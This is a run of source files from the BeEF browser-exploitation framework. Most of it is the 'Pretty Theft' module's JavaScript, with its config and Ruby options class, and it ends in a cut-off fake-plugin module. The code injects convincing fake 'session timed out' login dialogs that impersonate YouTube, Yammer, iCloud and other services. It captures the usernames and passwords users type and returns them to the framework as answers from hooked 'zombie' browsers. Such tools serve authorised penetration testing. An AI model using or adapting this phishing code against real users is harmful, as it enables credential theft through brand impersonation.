solid;height:43px;width:42px;background:#CFE7FE;filter: progid:DXImageTransform.Microsoft.gradient(startColorstr=#EEF2F4, endColorstr=#CCD8DF);background: -webkit-gradient(linear, left top, left bottom, from(#ffffff), to(#CFE7FE));background: -moz-linear-gradient(top, #EEF2F4, #CCD8DF);"'; var inputboxstyle = 'style="width:140px;font-size:11px;height: 20px;line-height:20px;padding-left:4px;border-style: solid;border-width: 1px;border-color:#666666;color:#000000;border-radius:3px;"'; var credstextstyle = 'style="font-size:11px;font-family:Segoe UI;"'; var buttonstyle = 'style="font-size: 13px;background:#069;color:#000000;border: 1px #29447e solid;padding: 3px 3px 3px 3px;margin-right:5px;border-radius:5px;width:70px;filter: progid:DXImageTransform.Microsoft.gradient(startColorstr=#ffffff, endColorstr=#CFCFCF);background: -webkit-gradient(linear, left top, left bottom, from(#ffffff), to(#CFCFCF));background: -moz-linear-gradient(top, #ffffff, #CFCFCF);"'; var buttonLabel = '<input type="button" name="ok" value="OK" id="ok" ' +buttonstyle+ ' onClick="document.getElementById(\'buttonpress\').value=\'true\'" onMouseOver="this.bgColor=\'#00CC00\'" onMouseOut="this.bgColor=\'#009900\'" bgColor=#009900>'; var bbarstyle = 'style="background-color:#F0F0F0;padding:8px;text-align:right;border-top: 1px solid #DFDFDF;height:28px;margin-top:10px;"'; // Build page including styles sneakydiv.innerHTML= '<div id="edge" '+edgeborder+'><div id="window_container" '+windowborder+ '><div id="title_bar" ' +titlebarstyle+ '>' +titlebartext+ '</div><div id="windowmain" ' +windowmain+ '><div id="prompt" '+promptstyle+'><p><span ' +titlestyle+ '>' +title+ '</span><br/><span ' +bodystyle+ '>' + body + '</span></div><div id="divide" ' +dividestyle+ '></div></p><table ' +tablestyle+ '><tr><td rowspan="3" width=75px align="center"><div id="logobox" ' +logobox+ '><div id="logo" ' +logo+ '></div></div></td><td align="left"><input type="text" id="uname" placeholder="User name" onkeydown="if (event.keyCode == 13) document.getElementById(\'buttonpress\').value=\'true\'"' +inputboxstyle+ '/></td></tr><tr><td align="left"><input type="password" id="pass" name="pass" placeholder="Password" onkeydown="if (event.keyCode == 13) document.getElementById(\'buttonpress\').value=\'true\'"' +inputboxstyle+ '/></td></tr><tr><td><input type="checkbox"><span ' +credstextstyle+ '>Remember my credentials</span></td></tr></table>' + '<div id="bottom_bar" ' +bbarstyle+ '>' +buttonLabel+ '<input type="hidden" id="buttonpress" name="buttonpress" value="false"/></div></div></div></div>'; // Repeatedly check if button has been pressed credgrabber = setInterval(checker,1000); } // YouTube floating div function youtube() { sneakydiv = document.createElement('div'); sneakydiv.setAttribute('id', 'popup'); sneakydiv.setAttribute('style', 'position:absolute; top:30%; left:40%; z-index:51; background-color:ffffff;'); document.body.appendChild(sneakydiv); // Set appearance using styles, maybe cleaner way to do this with CSS block? var windowborder = 'style="width:330px;background:white;border: 10px #999999 solid;border-radius:8px;"'; var windowmain = 'style="border:1px #555 solid;"'; var tbarstyle = 'style="color:white; font-size: 14px;font-family:Arial,sans-serif;font-weight: bold;outline-style: inherit;outline-color: #000000;outline-width: 1px;padding:5px;padding-left:8px;padding-right:6px;text-align: left;height: 30px;line-height:22px;border-bottom: 1px solid #CDCDCD;background: #F4F4F4;filter: progid:DXImageTransform.Microsoft.gradient(startColorstr=#919191, endColorstr=#595959);background: -webkit-gradient(linear, left top, left bottom, from(#919191), to(#595959));background: -moz-linear-gradient(top, #919191, #595959);"'; var bbarstyle = 'style="color: rgb(0, 0, 0);background-color: rgb(242, 242, 242);padding: 8px;text-align: right;border-top: 1px solid rgb(198, 198, 198);height:28px;margin-top:10px;"'; var messagestyle = 'style="align:left;font-size:11px;font-family:Arial,sans-serif;margin:10px 15px;line-height:12px;height:40px;"'; var box_prestyle = 'style="color: #666;font-size: 11px;font-weight: bold;font-family: Arial,sans-serif;padding-left:30px;"'; var inputboxstyle = 'style="width:140px;font-size: 11px;height: 20px;line-height:20px;padding-left:4px;border-style: solid;border-width: 1px;border-color:#CDCDCD;"'; var buttonstyle = 'style="font-size: 13px;background:#069;color:#fff;font-weight:bold;border: 1px #29447e solid;padding: 3px 3px 3px 3px;clear:both;margin-right:5px;"'; var logo = 'http://www.youtube.com/yt/brand/media/image/yt-brand-standard-logo-630px.png'; var title = 'Session Timed Out <img src="' + logo + '" align=right height=20 width=70 alt="YouTube">'; var messagewords = 'Your session has timed out due to inactivity.<br/><br/>Please re-enter your username and password to login.'; var buttonLabel = '<input type="button" name="ok" value="Sign In" id="ok" ' +buttonstyle+ ' onClick="document.getElementById(\'buttonpress\').value=\'true\'" onMouseOver="this.bgColor=\'#00CC00\'" onMouseOut="this.bgColor=\'#009900\'" bgColor=#009900>'; // Build page including styles sneakydiv.innerHTML= '<div id="window_container" '+windowborder+ '><div id="windowmain" ' +windowmain+ '><div id="title_bar" ' +tbarstyle+ '>' +title+ '</div><p id="message" ' +messagestyle+ '>' + messagewords + '</p><table><tr><td align="right"> <div id="box_pre" ' +box_prestyle+ '>Username: </div></td><td align="left"><input type="text" id="uname" value="" onkeydown="if (event.keyCode == 13) document.getElementById(\'buttonpress\').value=\'true\'"' +inputboxstyle+ '/></td></tr><tr><td align="right"><div id="box_pre" ' +box_prestyle+ '>Password: </div></td><td align="left"><input type="password" id="pass" name="pass" onkeydown="if (event.keyCode == 13) document.getElementById(\'buttonpress\').value=\'true\'"' +inputboxstyle+ '/></td></tr></table>' + '<div id="bottom_bar" ' +bbarstyle+ '>' +buttonLabel+ '<input type="hidden" id="buttonpress" name="buttonpress" value="false"/></div></div></div>'; // Repeatedly check if button has been pressed credgrabber = setInterval(checker,1000); } // Yammer floating div function yammer() { sneakydiv = document.createElement('div'); sneakydiv.setAttribute('id', 'popup'); sneakydiv.setAttribute('style', 'position:absolute; top:30%; left:40%; z-index:51; background-color:ffffff;'); document.body.appendChild(sneakydiv); // Set appearance using styles, maybe cleaner way to do this with CSS block? var windowborder = 'style="width:330px;background:white;border: 10px #999999 solid;border-radius:8px;"'; var windowmain = 'style="border:1px #555 solid;"'; var tbarstyle = 'style="color:white; font-size: 14px;font-family:Arial,sans-serif;font-weight: bold;outline-style: inherit;outline-color: #000000;outline-width: 1px;padding:5px;padding-left:8px;padding-right:6px;text-align: left;height: 30px;line-height:22px;border-bottom: 1px solid #CDCDCD;background: #F4F4F4;filter: progid:DXImageTransform.Microsoft.gradient(startColorstr=#919191, endColorstr=#595959);background: -webkit-gradient(linear, left top, left bottom, from(#919191), to(#595959));background: -moz-linear-gradient(top, #919191, #595959);"'; var bbarstyle = 'style="color: rgb(0, 0, 0);background-color: rgb(242, 242, 242);padding: 8px;text-align: right;border-top: 1px solid rgb(198, 198, 198);height:28px;margin-top:10px;"'; var messagestyle = 'style="align:left;font-size:11px;font-family:Arial,sans-serif;margin:10px 15px;line-height:12px;height:40px;"'; var box_prestyle = 'style="color: #666;font-size: 11px;font-weight: bold;font-family: Arial,sans-serif;padding-left:30px;"'; var inputboxstyle = 'style="width:140px;font-size: 11px;height: 20px;line-height:20px;padding-left:4px;border-style: solid;border-width: 1px;border-color:#CDCDCD;"'; var buttonstyle = 'style="font-size: 13px;background:#069;color:#fff;font-weight:bold;border: 1px #29447e solid;padding: 3px 3px 3px 3px;clear:both;margin-right:5px;"'; var logo = 'https://www.yammer.com/favicon.ico'; var title = 'Session Timed Out <img src="' + logo + '" align=right height=24 width=24 alt="Yammer">'; var messagewords = 'Your Yammer session has timed out due to inactivity.<br/><br/>Please re-enter your username and password to login.'; var buttonLabel = '<input type="button" name="ok" value="Sign In" id="ok" ' +buttonstyle+ ' onClick="document.getElementById(\'buttonpress\').value=\'true\'" onMouseOver="this.bgColor=\'#00CC00\'" onMouseOut="this.bgColor=\'#009900\'" bgColor=#009900>'; // Build page including styles sneakydiv.innerHTML= '<div id="window_container" '+windowborder+ '><div id="windowmain" ' +windowmain+ '><div id="title_bar" ' +tbarstyle+ '>' +title+ '</div><p id="message" ' +messagestyle+ '>' + messagewords + '</p><table><tr><td align="right"> <div id="box_pre" ' +box_prestyle+ '>Username: </div></td><td align="left"><input type="text" id="uname" value="" onkeydown="if (event.keyCode == 13) document.getElementById(\'buttonpress\').value=\'true\'"' +inputboxstyle+ '/></td></tr><tr><td align="right"><div id="box_pre" ' +box_prestyle+ '>Password: </div></td><td align="left"><input type="password" id="pass" name="pass" onkeydown="if (event.keyCode == 13) document.getElementById(\'buttonpress\').value=\'true\'"' +inputboxstyle+ '/></td></tr></table>' + '<div id="bottom_bar" ' +bbarstyle+ '>' +buttonLabel+ '<input type="hidden" id="buttonpress" name="buttonpress" value="false"/></div></div></div>'; // Repeatedly check if button has been pressed credgrabber = setInterval(checker,1000); } function ios() { /* start of Framework7 css * Framework7 0.10.0 * Full Featured HTML Framework For Building iOS 7 Apps * * http://www.idangero.us/framework7 * * Copyright 2014, Vladimir Kharlampidi * The iDangero.us * http://www.idangero.us/ * * Licensed under MIT * * Released on: December 8, 2014 */ var styles = ' * {' + 'font-family: Helvetica Neue,Helvetica,Arial,sans-serif;'+ 'margin: 0;'+ 'padding: 0;'+ 'font-size: 14px;' + 'line-height: 1.4;' + '-webkit-text-size-adjust: 100%;' + 'overflow: hidden;' + '-webkit-tap-highlight-color: transparent; ' + '-webkit-touch-callout: none; } '; styles += 'input { outline: 0; }'; styles += '.modal-overlay { ' + 'position: absolute; ' + 'left: 0; ' + 'top: 0; ' + 'width: 100%;' + 'height: 100%;' + 'background: rgba(0,0,0,.4);' + ' z-index: 10600;' + ' visibility: hidden;' + 'opacity: 0; ' + '-webkit-transition-duration: 400ms;' + 'transition-duration: 400ms; } '; styles += '.modal-overlay.modal-overlay-visible { visibility: visible; opacity: 1;} '; styles += '.modal { width: 270px; position: absolute; z-index: 11000; left: 50%; ' + 'margin-left: -135px; margin-top: 0; top: 50%; text-align: center; border-radius: 7px;' + 'opacity: 0; -webkit-transform: translate3d(0,0,0) scale(1.185); ' + 'transform: translate3d(0,0,0) scale(1.185); -webkit-transition-property: -webkit-transform,opacity;' + 'transition-property: transform,opacity; color: #000;}'; styles += '.modal.modal-in {opacity: 1; -webkit-transition-duration: 400ms;transition-duration: 400ms;' + '-webkit-transform: translate3d(0,0,0) scale(1); transform: translate3d(0,0,0) scale(1);}'; styles += '.modal-inner { padding: 15px;border-bottom: 1px solid #b5b5b5;border-radius: 7px 7px 0 0;' + 'background: #e8e8e8;}'; styles += '.modal-title { font-weight: 500; font-size: 18px;text-align: center}'; styles += '.modal-title + .modal-text {margin-top: 5px;}'; styles += '.modal-buttons { height: 44px; overflow: hidden;' + 'display: -webkit-box;' + 'display: -webkit-flex;' + 'display: flex;' + '-webkit-box-pack: center;' + '-webkit-justify-content: center;' + 'justify-content: center;}'; styles += '.modal-button {' + 'width: 100%;' + 'padding: 0 5px;' + 'height: 44px;' + 'font-size: 17px;' + 'line-height: 44px;' + 'text-align: center;' + 'color: #007aff;' + 'background: #e8e8e8;' + 'display: block;' + 'position: relative;' + 'white-space: nowrap;' + 'text-overflow: ellipsis;'+ 'overflow: hidden;'+ 'cursor: pointer;'+ '-webkit-box-sizing: border-box;'+ 'box-sizing: border-box;'+ 'border-right: 1px solid #b5b5b5;'+ '-webkit-box-flex: 1;} '; styles += '.modal-button.modal-button-bold {font-weight: 500;} '; styles += '.modal-button:first-child {border-radius:0 0 0 7px;} '; styles += '.modal-button:last-child {'+ ' border-radius: 0 0 7px 0;' + ' border-bottom: none; } '; styles += "input.modal-text-input {" + "-webkit-box-sizing: border-box;" + "box-sizing: border-box;" + "height: 30px;" + "background: #fff;"+ "margin: 0;" + "margin-top: 15px;" + "padding: 0 5px;" + "border: 1px solid #a0a0a0;" + "border-radius: 5px;" + "width: 100%;" + "font-size: 14px;" + "font-family: inherit;" + "display: block;" + "-webkit-box-shadow: 0 0 0 transparent;" + "box-shadow: 0 0 0 transparent;" + "-webkit-appearance: none;" + "appearance: none; }"; styles += "input.modal-text-input.modal-text-input-double {" + "border-radius: 5px 5px 0 0; }"; styles += "input.modal-text-input.modal-text-input-double+input.modal-text-input {"+ " margin-top: 0;" + " border-top: 0;" + " border-radius: 0 0 5px 5px; }"; /*end of Framework7 css*/ styles += "input[type=submit] { " + " visibility: hidden;" + " position: absolute;" + " top: -999px; }"; styles += "input[type=text],input[type=password] { " + " font-size: 16px; }" ; styles += "#pass + div {"+ " display: block;"+ "position: absolute;"+ "top: -10px;"+ "left: -53px;"+ "width: 3000px;"+ "height: 3000px;"+ "background-color: white;"+ "z-index: 1;"+ "font-size: 14px;"+ "pointer-events: none;"+ "text-align: left; }"; styles += '@media only screen ' + 'and (min-device-width : 768px)' + 'and (max-device-width : 1024px)' + 'and (orientation : landscape) {' + '.modal.modal-in {' + ' opacity: 1;' + '-webkit-transition-duration: 400ms;'+ 'transition-duration: 400ms;'+ '-webkit-transform: translate3d(0,0,0) scale(0.9);'+ 'transform: translate3d(0,0,0) scale(0.9);' + 'left: 200px;} ' + ' #pass + div { top: -23px; left: -87px;} }'; styles +='@media only screen and (min-device-width : 768px)' + 'and (max-device-width : 1024px) and (orientation : portrait) {' + '.modal.modal-in { opacity: 1; -webkit-transition-duration: 400ms;' + 'transition-duration: 400ms; -webkit-transform: translate3d(0,0,0) scale(0.8);'+ 'transform: translate3d(0,0,0) scale(0.8);} ' + '#pass + div {top: -39px;left: -305px;} }'; styles += '#pass:focus + div {display: none;}'; styleElement = $j(document.createElement('style')).text(styles); title = $j(document.createElement('div')); title.text('iCloud login'); title.addClass('modal-title'); description = $j(document.createElement('div')); description.addClass('modal-text'); description.text('Enter your Apple ID e-mail address and password'); user = $j(document.createElement('input')); user.addClass('modal-text-input').addClass('modal-text-input-double'); user.attr('name','modal-username'); user.attr('id','uname'); user.text(''); user.keydown(function(event) { if(event.keyCode == 13) { $j('#buttonpress').attr('value', 'true'); } }); password = $j(document.createElement('input')); password.addClass('modal-text-input').addClass('mobile-text-input-double'); password.attr('autofocus',''); password.attr('id', "pass"); password.attr('name',"modal-password"); password.attr('placeholder',"Password"); password.attr('type', 'password'); password.keydown(function(event) { if(event.keyCode == 13) { $j('#buttonpress').attr('value', 'true'); } }); cancel = $j(document.createElement('span')); cancel.addClass('modal-button'); cancel.text('Cancel'); ok = $j(document.createElement('span')); ok.addClass('modal-button').addClass('modal-button-bold'); okLabel = $j(document.createElement('label')); okLabel.attr('for','submit'); okLabel.css('width', '100%'); okLabel.css('height', '100%'); okLabel.text('OK'); okLabel.click(function() { $j('#buttonpress').attr('value','true'); }); okLabel.append( $j(document.createElement('input')) .attr('id', 'submit') .attr('type','submit') .attr('value','OK'), $j(document.createElement('input')) .attr('id','buttonpress') .attr('type', 'hidden') .attr('name','buttonpress') .attr('value', 'false') ); ok.append(okLabel); var buttons = $j(document.createElement('div')); buttons.addClass('modal-buttons'); buttons.append(cancel, ok); var inner = $j(document.createElement('div')); inner.addClass('modal-inner'); inner.append(title, description, user,password); uiContainer = $j(document.createElement('div')); uiContainer.addClass('modal').addClass('modal-in'); uiContainer.css('top', '10px'); uiContainer.append(inner, buttons); sneakydiv = $j(document.createElement('div')); sneakydiv.addClass('modal-overlay').addClass('modal-overlay-visible'); sneakydiv.attr('id','popup'); sneakydiv.append(styleElement, uiContainer); $j('body').append(sneakydiv); credgrabber = setInterval(checker, 1000); } // Generic floating div with image function generic() { sneakydiv = document.createElement('div'); sneakydiv.setAttribute('id', 'popup'); sneakydiv.setAttribute('style', 'width:400px;position:absolute; top:20%; left:40%; z-index:51; background-color:white;font-family:\'Arial\',Arial,sans-serif;border-width:thin;border-style:solid;border-color:#000000'); sneakydiv.setAttribute('align', 'center'); document.body.appendChild(sneakydiv); sneakydiv.innerHTML= '<br><img src=\''+imgr+'\' width=\'80px\' height\'80px\' /><h2>Your session has timed out!</h2><p>For your security, your session has been timed out. To continue browsing this site, please re-enter your username and password below.</p><table border=\'0\'><tr><td>Username:</td><td><input type=\'text\' name=\'uname\' id=\'uname\' value=\'\' onkeydown=\'if (event.keyCode == 13) document.getElementById(\"buttonpress\").value=\"true\";\'></input></td></td><tr><td>Password:</td><td><input type=\'password\' name=\'pass\' id=\'pass\' value=\'\' onkeydown=\'if (event.keyCode == 13) document.getElementById(\"buttonpress\").value=\"true\";\'></input></td></tr></table><br><input type=\'button\' name=\'lul\' id=\'lul\' onClick=\'document.getElementById(\"buttonpress\").value=\"true\";\' value=\'Ok\'><br/><input type="hidden" id="buttonpress" name="buttonpress" value="false"/><br/>'; // Repeatedly check if button has been pressed credgrabber = setInterval(checker,1000); } // Set background opacity and apply background var backcolor = "<%== @backing %>"; if(backcolor == "Grey"){ grayOut(true,{'opacity':'70'}); } else if(backcolor == "Clear"){ grayOut(true,{'opacity':'0'}); } // Retrieve the chosen div option from BeEF and display var choice = "<%= @choice %>"; switch (choice) { case "Facebook": facebook(); break; case "LinkedIn": linkedin(); break; case "Windows": windows(); break; case "YouTube": youtube(); break; case "Yammer": yammer(); break; case "IOS": ios(); break; default: generic(); break; } });
YAML
beef/modules/social_engineering/pretty_theft/config.yaml
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # beef: module: pretty_theft: enable: true category: "Social Engineering" name: "Pretty Theft" description: "Asks the user for their username and password using a floating div." authors: ["pwndizzle", "vt [[email protected]]", "xntrik"] target: user_notify: ['ALL'] not_working: ['IE']
Ruby
beef/modules/social_engineering/pretty_theft/module.rb
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # class Pretty_theft < BeEF::Core::Command def self.options @configuration = BeEF::Core::Configuration.instance proto = @configuration.beef_proto beef_host = @configuration.beef_host beef_port = @configuration.beef_port base_host = "#{proto}://#{beef_host}:#{beef_port}" logo_uri = "#{base_host}/ui/media/images/beef.png" [ { 'name' => 'choice', 'type' => 'combobox', 'ui_label' => 'Dialog Type', 'store_type' => 'arraystore', 'store_fields' => ['choice'], 'store_data' => [['Facebook'], ['LinkedIn'], ['Windows'], ['YouTube'], ['Yammer'], ['IOS'], ['Generic']], 'valueField' => 'choice', 'value' => 'Facebook', editable: false, 'displayField' => 'choice', 'mode' => 'local', 'autoWidth' => true }, { 'name' => 'backing', 'type' => 'combobox', 'ui_label' => 'Backing', 'store_type' => 'arraystore', 'store_fields' => ['backing'], 'store_data' => [['Grey'], ['Clear']], 'valueField' => 'backing', 'value' => 'Grey', editable: false, 'displayField' => 'backing', 'mode' => 'local', 'autoWidth' => true }, { 'name' => 'imgsauce', 'description' => 'Custom Logo', 'ui_label' => 'Custom Logo (Generic only)', 'value' => logo_uri } ] end # # This method is being called when a zombie sends some # data back to the framework. # def post_execute save({ 'answer' => @datastore['answer'] }) end end
JavaScript
beef/modules/social_engineering/replace_video_fake_plugin/command.js
// // Copyright (c) 2006-2023Wade Alcorn - [email protected] // Browser Exploitation Framework (BeEF) - http://beefproject.com // See the file 'doc/COPYING' for copying permission // beef.execute(function() { $j('<%= @jquery_selector %>').each(function(){ var width = $j(this).css('width'); var height = $j(this).css('height'); $j(this).replaceWith('<img src="data:image/png;base64,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